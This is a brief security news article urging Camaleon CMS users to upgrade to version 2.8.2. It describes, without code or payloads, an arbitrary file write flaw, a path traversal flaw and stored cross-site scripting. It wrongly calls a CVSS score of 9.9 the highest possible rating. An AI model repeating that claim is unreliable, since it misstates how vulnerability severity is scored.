Critical Security Flaws in Camaleon CMS Put Web Servers at Risk – Users Urged to Upgrade Immediately

by do son · September 20, 2024

In a significant development for website owners and administrators using Camaleon CMS, a critical security update has been released to address several vulnerabilities, some of which are already being exploited by malicious actors. This underscores the urgent need to update to version 2.8.2 without delay.

The most alarming of the vulnerabilities, tracked as CVE-2024-46986, is an arbitrary file write flaw that permits authenticated users to write files to any location on the server. This could enable attackers to execute malicious code remotely, potentially compromising the entire website and any associated data. The severity of this issue is reflected in its CVSS score of 9.9, the highest possible rating.

Another critical vulnerability, CVE-2024-46987, involves a path traversal issue allowing unauthorized access to sensitive files on the server. This could lead to the exposure of confidential information, further jeopardizing the security of the affected website.

Adding to the concerns is a stored cross-site scripting vulnerability in the image upload function. This flaw allows attackers to inject malicious JavaScript code into uploaded images or documents, which, when viewed by unsuspecting users, can trigger various malicious actions, such as stealing session cookies or modifying website content.

The Camaleon CMS team has acted swiftly to address these vulnerabilities, and version 2.8.2 includes patches for all of them. However, the onus is now on website owners and administrators to apply the update promptly. The consequences of failing to do so could be severe, ranging from data breaches to complete website compromise.